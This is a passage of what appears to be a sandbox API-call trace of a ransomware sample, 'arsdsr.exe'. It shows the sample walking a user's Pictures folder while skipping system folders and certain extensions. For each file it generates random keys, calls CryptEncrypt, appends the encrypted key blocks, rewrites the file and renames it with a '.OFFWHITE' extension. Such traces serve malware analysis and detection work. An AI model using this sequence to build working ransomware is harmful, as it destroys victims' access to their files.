lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2f0e710, ftCreationTime.dwHighDateTime=0x1d5e079, ftLastAccessTime.dwLowDateTime=0xcd6d5390, ftLastAccessTime.dwHighDateTime=0x1d5e1d7, ftLastWriteTime.dwLowDateTime=0xcd6d5390, ftLastWriteTime.dwHighDateTime=0x1d5e1d7, nFileSizeHigh=0x0, nFileSizeLow=0x162dd, dwReserved0=0x295d1bc, dwReserved1=0x3742a4d2, cFileName="QltoyVBmQzFR.jpg", cAlternateFileName="QLTOYV~1.JPG")) returned 1 [0135.529] lstrcmpiW (lpString1="QltoyVBmQzFR.jpg", lpString2=".") returned 1 [0135.529] lstrcmpiW (lpString1="QltoyVBmQzFR.jpg", lpString2="..") returned 1 [0135.529] lstrcmpiW (lpString1="QltoyVBmQzFR.jpg", lpString2="...") returned 1 [0135.529] lstrcmpiW (lpString1="QltoyVBmQzFR.jpg", lpString2="windows") returned -1 [0135.529] lstrcmpiW (lpString1="QltoyVBmQzFR.jpg", lpString2="$recycle.bin") returned 1 [0135.529] lstrcmpiW (lpString1="QltoyVBmQzFR.jpg", lpString2="rsa") returned -1 [0135.529] lstrcmpiW (lpString1="QltoyVBmQzFR.jpg", lpString2="ntuser.dat") returned 1 [0135.529] lstrcmpiW (lpString1="QltoyVBmQzFR.jpg", lpString2="programdata") returned 1 [0135.529] lstrcmpiW (lpString1="QltoyVBmQzFR.jpg", lpString2="appdata") returned 1 [0135.529] lstrcmpiW (lpString1="QltoyVBmQzFR.jpg", lpString2="program files") returned 1 [0135.529] lstrcmpiW (lpString1="QltoyVBmQzFR.jpg", lpString2="program files (x86)") returned 1 [0135.529] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\" [0135.529] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\", lpString2="QltoyVBmQzFR.jpg" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\QltoyVBmQzFR.jpg") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\QltoyVBmQzFR.jpg" [0135.529] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.529] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.529] PathFindExtensionW (pszPath="QltoyVBmQzFR.jpg") returned=".jpg" [0135.529] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0135.529] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0135.529] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0135.529] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0135.529] lstrcmpiW (lpString1=".jpg", lpString2=".com") returned 1 [0135.529] lstrcmpiW (lpString1=".jpg", lpString2=".cpl") returned 1 [0135.529] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0135.530] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0135.530] lstrcmpiW (lpString1=".jpg", lpString2=".url") returned -1 [0135.530] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0135.530] lstrcmpiW (lpString1=".jpg", lpString2=".mp3") returned -1 [0135.530] lstrcmpiW (lpString1=".jpg", lpString2=".pif") returned -1 [0135.530] lstrcmpiW (lpString1=".jpg", lpString2=".mp4") returned -1 [0135.530] lstrcmpiW (lpString1=".jpg", lpString2=".OFFWHITE") returned -1 [0135.530] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0135.530] lstrcmpiW (lpString1="QltoyVBmQzFR.jpg", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0135.530] GetProcessHeap () returned 0x500000 [0135.530] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531ab0 [0135.530] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\QltoyVBmQzFR.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\rmts7wxti\\qltoyvbmqzfr.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0135.530] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=90845) returned 1 [0135.530] GetProcessHeap () returned 0x500000 [0135.530] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.530] GetProcessHeap () returned 0x500000 [0135.530] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.530] GetProcessHeap () returned 0x500000 [0135.530] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.530] GetProcessHeap () returned 0x500000 [0135.530] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.530] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.530] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.530] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.530] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.530] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.530] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.531] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.531] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.531] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295cf90*=0x100) returned 1 [0135.531] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.531] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.531] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0135.531] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x162dd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.531] SetLastError (dwErrCode=0x0) [0135.531] WriteFile (in: hFile=0x218, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0135.533] GetLastError () returned 0x0 [0135.533] GetLastError () returned 0x0 [0135.533] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x163dd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.533] WriteFile (in: hFile=0x218, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0135.533] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x164dd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.533] WriteFile (in: hFile=0x218, lpBuffer=0x531ab0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x531ab0*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0135.533] GetProcessHeap () returned 0x500000 [0135.533] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x162dd) returned 0x55c7c8 [0135.533] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.533] ReadFile (in: hFile=0x218, lpBuffer=0x55c7c8, nNumberOfBytesToRead=0x162dd, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesRead=0x295d1c0*=0x162dd, lpOverlapped=0x0) returned 1 [0135.538] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.538] WriteFile (in: hFile=0x218, lpBuffer=0x55c7c8*, nNumberOfBytesToWrite=0x162dd, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesWritten=0x295d1cc*=0x162dd, lpOverlapped=0x0) returned 1 [0135.539] GetProcessHeap () returned 0x500000 [0135.539] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55c7c8 | out: hHeap=0x500000) returned 1 [0135.539] CloseHandle (hObject=0x218) returned 1 [0135.546] GetProcessHeap () returned 0x500000 [0135.546] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.546] GetProcessHeap () returned 0x500000 [0135.546] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.546] GetProcessHeap () returned 0x500000 [0135.546] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.546] GetProcessHeap () returned 0x500000 [0135.546] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.546] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\QltoyVBmQzFR.jpg" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\QltoyVBmQzFR.jpg") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\QltoyVBmQzFR.jpg" [0135.546] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\QltoyVBmQzFR.jpg", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\QltoyVBmQzFR.jpg.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\QltoyVBmQzFR.jpg.OFFWHITE" [0135.546] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\QltoyVBmQzFR.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\rmts7wxti\\qltoyvbmqzfr.jpg"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\QltoyVBmQzFR.jpg.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\rmts7wxti\\qltoyvbmqzfr.jpg.offwhite")) returned 1 [0135.547] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3609aa20, ftCreationTime.dwHighDateTime=0x1d5e5fc, ftLastAccessTime.dwLowDateTime=0x28a2800, ftLastAccessTime.dwHighDateTime=0x1d5e692, ftLastWriteTime.dwLowDateTime=0x28a2800, ftLastWriteTime.dwHighDateTime=0x1d5e692, nFileSizeHigh=0x0, nFileSizeLow=0x8c25, dwReserved0=0x295d1bc, dwReserved1=0x3742a4d2, cFileName="UZ2t6gfaTvl_D.jpg", cAlternateFileName="UZ2T6G~1.JPG")) returned 1 [0135.547] lstrcmpiW (lpString1="UZ2t6gfaTvl_D.jpg", lpString2=".") returned 1 [0135.547] lstrcmpiW (lpString1="UZ2t6gfaTvl_D.jpg", lpString2="..") returned 1 [0135.547] lstrcmpiW (lpString1="UZ2t6gfaTvl_D.jpg", lpString2="...") returned 1 [0135.547] lstrcmpiW (lpString1="UZ2t6gfaTvl_D.jpg", lpString2="windows") returned -1 [0135.547] lstrcmpiW (lpString1="UZ2t6gfaTvl_D.jpg", lpString2="$recycle.bin") returned 1 [0135.547] lstrcmpiW (lpString1="UZ2t6gfaTvl_D.jpg", lpString2="rsa") returned 1 [0135.547] lstrcmpiW (lpString1="UZ2t6gfaTvl_D.jpg", lpString2="ntuser.dat") returned 1 [0135.547] lstrcmpiW (lpString1="UZ2t6gfaTvl_D.jpg", lpString2="programdata") returned 1 [0135.547] lstrcmpiW (lpString1="UZ2t6gfaTvl_D.jpg", lpString2="appdata") returned 1 [0135.547] lstrcmpiW (lpString1="UZ2t6gfaTvl_D.jpg", lpString2="program files") returned 1 [0135.547] lstrcmpiW (lpString1="UZ2t6gfaTvl_D.jpg", lpString2="program files (x86)") returned 1 [0135.548] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\" [0135.548] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\", lpString2="UZ2t6gfaTvl_D.jpg" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\UZ2t6gfaTvl_D.jpg") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\UZ2t6gfaTvl_D.jpg" [0135.548] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.548] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.548] PathFindExtensionW (pszPath="UZ2t6gfaTvl_D.jpg") returned=".jpg" [0135.548] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0135.548] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0135.548] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0135.548] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0135.548] lstrcmpiW (lpString1=".jpg", lpString2=".com") returned 1 [0135.548] lstrcmpiW (lpString1=".jpg", lpString2=".cpl") returned 1 [0135.548] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0135.548] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0135.548] lstrcmpiW (lpString1=".jpg", lpString2=".url") returned -1 [0135.548] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0135.548] lstrcmpiW (lpString1=".jpg", lpString2=".mp3") returned -1 [0135.548] lstrcmpiW (lpString1=".jpg", lpString2=".pif") returned -1 [0135.548] lstrcmpiW (lpString1=".jpg", lpString2=".mp4") returned -1 [0135.548] lstrcmpiW (lpString1=".jpg", lpString2=".OFFWHITE") returned -1 [0135.548] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0135.548] lstrcmpiW (lpString1="UZ2t6gfaTvl_D.jpg", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0135.548] GetProcessHeap () returned 0x500000 [0135.548] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531ac0 [0135.548] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\UZ2t6gfaTvl_D.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\rmts7wxti\\uz2t6gfatvl_d.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0135.549] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=35877) returned 1 [0135.549] GetProcessHeap () returned 0x500000 [0135.549] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.549] GetProcessHeap () returned 0x500000 [0135.549] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.549] GetProcessHeap () returned 0x500000 [0135.549] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.549] GetProcessHeap () returned 0x500000 [0135.549] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.549] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.549] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.549] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.549] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.549] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.549] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.549] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.549] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.549] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295cf90*=0x100) returned 1 [0135.549] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.549] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.549] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0135.549] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x8c25, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.549] SetLastError (dwErrCode=0x0) [0135.550] WriteFile (in: hFile=0x218, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0135.551] GetLastError () returned 0x0 [0135.551] GetLastError () returned 0x0 [0135.551] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x8d25, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.551] WriteFile (in: hFile=0x218, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0135.551] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x8e25, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.551] WriteFile (in: hFile=0x218, lpBuffer=0x531ac0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x531ac0*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0135.551] GetProcessHeap () returned 0x500000 [0135.551] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8c25) returned 0x55c7c8 [0135.552] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.552] ReadFile (in: hFile=0x218, lpBuffer=0x55c7c8, nNumberOfBytesToRead=0x8c25, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesRead=0x295d1c0*=0x8c25, lpOverlapped=0x0) returned 1 [0135.554] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.554] WriteFile (in: hFile=0x218, lpBuffer=0x55c7c8*, nNumberOfBytesToWrite=0x8c25, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesWritten=0x295d1cc*=0x8c25, lpOverlapped=0x0) returned 1 [0135.554] GetProcessHeap () returned 0x500000 [0135.554] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55c7c8 | out: hHeap=0x500000) returned 1 [0135.554] CloseHandle (hObject=0x218) returned 1 [0135.557] GetProcessHeap () returned 0x500000 [0135.557] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.557] GetProcessHeap () returned 0x500000 [0135.557] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.557] GetProcessHeap () returned 0x500000 [0135.557] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.557] GetProcessHeap () returned 0x500000 [0135.557] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.557] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\UZ2t6gfaTvl_D.jpg" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\UZ2t6gfaTvl_D.jpg") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\UZ2t6gfaTvl_D.jpg" [0135.557] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\UZ2t6gfaTvl_D.jpg", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\UZ2t6gfaTvl_D.jpg.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\UZ2t6gfaTvl_D.jpg.OFFWHITE" [0135.557] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\UZ2t6gfaTvl_D.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\rmts7wxti\\uz2t6gfatvl_d.jpg"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\UZ2t6gfaTvl_D.jpg.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\rmts7wxti\\uz2t6gfatvl_d.jpg.offwhite")) returned 1 [0135.558] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a57160, ftCreationTime.dwHighDateTime=0x1d5d9c0, ftLastAccessTime.dwLowDateTime=0xe6619e80, ftLastAccessTime.dwHighDateTime=0x1d5db0e, ftLastWriteTime.dwLowDateTime=0xe6619e80, ftLastWriteTime.dwHighDateTime=0x1d5db0e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295d1bc, dwReserved1=0x3742a4d2, cFileName="wu4JnlA", cAlternateFileName="")) returned 1 [0135.558] lstrcmpiW (lpString1="wu4JnlA", lpString2=".") returned 1 [0135.558] lstrcmpiW (lpString1="wu4JnlA", lpString2="..") returned 1 [0135.558] lstrcmpiW (lpString1="wu4JnlA", lpString2="...") returned 1 [0135.558] lstrcmpiW (lpString1="wu4JnlA", lpString2="windows") returned 1 [0135.558] lstrcmpiW (lpString1="wu4JnlA", lpString2="$recycle.bin") returned 1 [0135.558] lstrcmpiW (lpString1="wu4JnlA", lpString2="rsa") returned 1 [0135.558] lstrcmpiW (lpString1="wu4JnlA", lpString2="ntuser.dat") returned 1 [0135.558] lstrcmpiW (lpString1="wu4JnlA", lpString2="programdata") returned 1 [0135.558] lstrcmpiW (lpString1="wu4JnlA", lpString2="appdata") returned 1 [0135.558] lstrcmpiW (lpString1="wu4JnlA", lpString2="program files") returned 1 [0135.558] lstrcmpiW (lpString1="wu4JnlA", lpString2="program files (x86)") returned 1 [0135.558] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\" [0135.558] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\", lpString2="wu4JnlA" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA" [0135.558] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\" [0135.558] lstrcpyW (in: lpString1=0x295cff0, lpString2="C:/Users\\5p5NrGJn0jS 